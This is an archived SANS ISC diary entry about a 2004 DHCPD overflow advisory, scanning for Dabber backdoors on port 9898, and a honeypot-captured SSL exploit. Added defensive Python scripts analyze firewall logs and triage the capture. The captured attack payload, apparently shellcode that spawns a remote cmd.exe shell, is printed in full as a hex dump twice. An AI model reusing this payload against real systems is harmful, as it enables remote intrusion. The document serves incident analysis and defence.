Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


ISC DHCPD buffer overflow exploit code produced in the lab

Published: 2004-06-23
Last Updated: 2004-06-23 22:30:57 UTC
by George Bakos (Version: 1)
0 comment(s)
US-CERT yesterday released an advisory, while the Internet Software Consortium
(ISC) released updated software, addressing two vulnerabilities in ISC's
Dynamic Host Configuration Protocol server software. ISC DHCPD is included in
most Unix and Unix-like operating systems.

Joshua Wright of the SANS Institute has confirmed through demonstration
(internal-use only code) that at least one of the two buffer overflow
vulnerabilities is exploitable to deliver a denial of service attack, and most
likely root access with a little more work. It should be assumed that others
(read: "bad guys") are at least as diligent in their efforts to exploit these
vulnerabilities. Although we haven't yet had any reports of compromises
attributable to this, please update your systems and review your overall
defenses. As always, a little bit of prevention goes a long way. Be sure you
are filtering traffic at all network boundaries, be it with a firewall or a
screening router, where feasible. DHCP servers listen on 67/UDP, and that port
should be denied to any untrusted networks.

ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 appear to be the only vulnerable
versions. See http://www.us-cert.gov/cas/techalerts/TA04-174A.html for more
info and http://www.isc.org/index.pl?/sw/dhcp/ for software updates.

-------------------

Scanning for Dabber

-------------------

Over the past couple of days there has been a large rise in port 9898 activity
reported to DShield (http://www.dshield.org/port_report.php?port=9898). The
Dabber worm (which rides in on the coattails of Sasser) opens a listener on
port 9898, which the attacking system then probes to confirm its success. We're
unaware of any "counter-counter" worm that looks for Dabber backdoors, but I
have seen a significant rise in scanning for it as well. My honeypotted
networks have seen several sequential SYN "half-open" scans, where the scanner
returns a RST packet whenever its SYN is acknowledged.

Likely, someone is harvesting lists for later use. If anyone captures port 9898
activity other than SYN scanning, please pass that info along.

And the cycle continues.
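To turn the "please pass that info along" request into something a firewall log can answer, here is an added Python example (it is not from the diary and not from any tool mentioned in it). It reads iptables-style LOG lines, separates bare-SYN probes to 9898/tcp from any other flag combination on that port, and for each scanning source counts distinct targets and the longest run of consecutive destination addresses, which is what a sequential sweep looks like. The log lines, the addresses in them and the assumption that flags appear as bare SYN/ACK/PSH tokens (as iptables LOG prints them) are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in iptables LOG format (not from the diary): one source
# sweeping five consecutive honeypot addresses on 9898/tcp (with one
# retransmitted SYN), one source that probes a single address and then
# completes a session, and an unrelated 445/tcp probe.
LOG_LINES = """\
Jun 23 09:12:01 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 PROTO=TCP SPT=3021 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:01 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.11 PROTO=TCP SPT=3022 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:02 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.12 PROTO=TCP SPT=3023 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:02 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.13 PROTO=TCP SPT=3024 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:02 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.14 PROTO=TCP SPT=3025 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:05 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 PROTO=TCP SPT=3021 DPT=9898 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:12:09 hp kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 PROTO=TCP SPT=3030 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0
Jun 23 09:40:17 hp kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.12 PROTO=TCP SPT=1187 DPT=9898 WINDOW=65535 RES=0x00 SYN URGP=0
Jun 23 09:40:18 hp kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.12 PROTO=TCP SPT=1187 DPT=9898 WINDOW=65535 RES=0x00 ACK PSH URGP=0
"""

KV = re.compile(r"(\w+)=(\S*)")
FLAG_TOKENS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def parse_line(line):
    """Split an iptables LOG line into key=value fields plus the set of TCP
    flags (flags are printed as bare words, so they are collected separately)."""
    fields = dict(KV.findall(line))
    fields["FLAGS"] = frozenset(t for t in line.split() if t in FLAG_TOKENS)
    return fields


def longest_sequential_run(addresses):
    """Longest run in which each address is numerically the previous one + 1."""
    if not addresses:
        return 0
    ints = [int(ipaddress.ip_address(a)) for a in addresses]
    best = run = 1
    for prev, cur in zip(ints, ints[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def analyze_port_activity(lines, port=9898, min_targets=3):
    """Separate bare-SYN (half-open) probes to `port` from everything else.

    Returns scanning sources (distinct targets >= min_targets) with the length
    of their longest consecutive-address run, and, separately, every source
    that sent a segment other than a bare SYN to the port: traffic that went
    past the initial probe and deserves a closer look.
    """
    probes = defaultdict(list)   # src -> destinations hit with a bare SYN
    other = defaultdict(set)     # src -> flag combinations seen beyond a SYN
    for line in lines:
        f = parse_line(line)
        if f.get("PROTO") != "TCP" or f.get("DPT") != str(port):
            continue
        if f["FLAGS"] == {"SYN"}:
            probes[f["SRC"]].append(f["DST"])
        else:
            other[f["SRC"]].add(" ".join(sorted(f["FLAGS"])))
    scanners = {}
    for src, dsts in probes.items():
        distinct = list(dict.fromkeys(dsts))   # drop retransmits, keep order
        if len(distinct) >= min_targets:
            scanners[src] = {"targets": len(distinct),
                             "longest_sequential_run": longest_sequential_run(distinct)}
    return {"scanners": scanners,
            "other_activity": {src: sorted(v) for src, v in other.items()}}


if __name__ == "__main__":
    print(analyze_port_activity(LOG_LINES.splitlines()))
```

On the sample, the sweeping host is reported with five targets and a sequential run of five, while the host that completed a session shows up under `other_activity` with its `ACK PSH` segment rather than among the scanners; a source that only probed one or two addresses is ignored by the `min_targets` threshold.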

----------

SSL Attack

----------

Jim Forster reported a possible variant of an existing SSL exploit. Can anyone else correlate against this?

One of my HoneyPots was hit with what appears to be an altered strain of the THC-IIS SSL Exploit this morning.

#(4 - 55197) [2004-06-23 07:54:46] HoneyPot 443 TCP
IPv4: 64.144.15.152 -> **.***.***.***
hlen=5 TOS=0 dlen=391 ID=11410 flags=0 offset=0 TTL=114 chksum=*****
TCP: port=2557 -> dport: 443 flags=***AP*** seq=1215225933
ack=177711253 off=5 res=0 win=64240 urp=0 chksum=*****
Payload: length = 351

000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 46 49 52 45 50 4F 52 54 39 39 39 32 5E ...FIREPORT9992^
020 : BE 98 EB 25 89 DD D3 03 9C 0B 02 06 6C 59 6C 59 ...%........lYlY
030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0e0 : 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0f0 : 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 : 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 : 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 : 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 : 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 : 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 : FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.

Thanks, Jim!
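The dump Jim posted can be rebuilt into bytes and triaged without running anything from it. The following Python is an added example, not part of the diary and not code from any tool it names; it embeds the payload dump above as constructed input, checks each line's offset against the running byte count and the declared 351-byte length, extracts printable strings the way strings(1) does, and decodes the opening bytes as an SSLv2-style record header (a first byte with the high bit set means a two-byte header carrying the record length, followed by the message type). The indicator list and the result field names are my own choices.

```python
import re
import string

# Constructed input: the diary's 351-byte payload dump, reproduced verbatim in
# its "offset : sixteen hex bytes  ascii column" layout (raw string because the
# ascii column contains a backslash).
CAPTURE = r"""Payload: length = 351

000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 46 49 52 45 50 4F 52 54 39 39 39 32 5E ...FIREPORT9992^
020 : BE 98 EB 25 89 DD D3 03 9C 0B 02 06 6C 59 6C 59 ...%........lYlY
030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0e0 : 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0f0 : 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 : 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 : 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 : 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 : 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 : 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 : FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.
"""

LENGTH_LINE = re.compile(r"Payload:\s*length\s*=\s*(\d+)")
HEX_LINE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")

# Strings nobody expects inside an SSL handshake: the Winsock library the code
# resolves and the shell it names. Assumed indicator list for this example.
INDICATORS = ("WS2_32.DLL", "cmd", ".exe")


def parse_hexdump(text):
    """Rebuild raw bytes from a 16-bytes-per-line dump.

    Each line is read for at most 16 tokens and stops at the first token that
    is not exactly two hex digits, so the ascii column never leaks in. Offsets
    are checked against the running byte count and the declared length against
    the total, so a dropped or duplicated line is an error, not a silent shift.
    """
    payload, declared = bytearray(), None
    for line in text.splitlines():
        m = LENGTH_LINE.search(line)
        if m:
            declared = int(m.group(1))
            continue
        m = HEX_LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(payload):
            raise ValueError(f"offset {offset:#x} but {len(payload)} bytes parsed so far")
        for token in m.group(2).split()[:16]:
            if not HEX_BYTE.match(token):
                break
            payload.append(int(token, 16))
    if declared is not None and declared != len(payload):
        raise ValueError(f"declared {declared} bytes, parsed {len(payload)}")
    return bytes(payload)


def printable_strings(data, min_len=4):
    """Runs of at least min_len printable ASCII bytes, like strings(1)."""
    found, run = [], []
    for b in data + b"\x00":  # trailing sentinel flushes the last run
        if b < 0x80 and chr(b) in PRINTABLE:
            run.append(chr(b))
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
    return found


def decode_sslv2_header(data):
    """Decode the SSLv2-style two-byte record header opening the payload:
    high bit set on the first byte, record length in the low 15 bits, then the
    message type (1 = CLIENT-HELLO). A record length far below the bytes
    actually carried is itself worth flagging."""
    if len(data) < 3 or not data[0] & 0x80:
        return None
    record_len = ((data[0] & 0x7F) << 8) | data[1]
    return {"record_len": record_len, "msg_type": data[2], "carried": len(data) - 2}


def triage(text):
    """Summarise a captured payload dump for an analyst."""
    data = parse_hexdump(text)
    strs = printable_strings(data)
    hits = sorted(ind for ind in INDICATORS if any(ind in s for s in strs))
    return {"length": len(data), "header": decode_sslv2_header(data),
            "strings": strs, "indicators": hits}


if __name__ == "__main__":
    print(triage(CAPTURE))
```

Run against the dump above, the parser confirms the 351 bytes the alert declared, the header decodes to a 98-byte record of message type 1 while 349 bytes actually follow it, and the string pass surfaces `FIREPORT9992^`, `XFWS2_32.DLL` and `Sh.exeh\cmd`, which is enough to match a capture like this against Jim's without touching the payload itself.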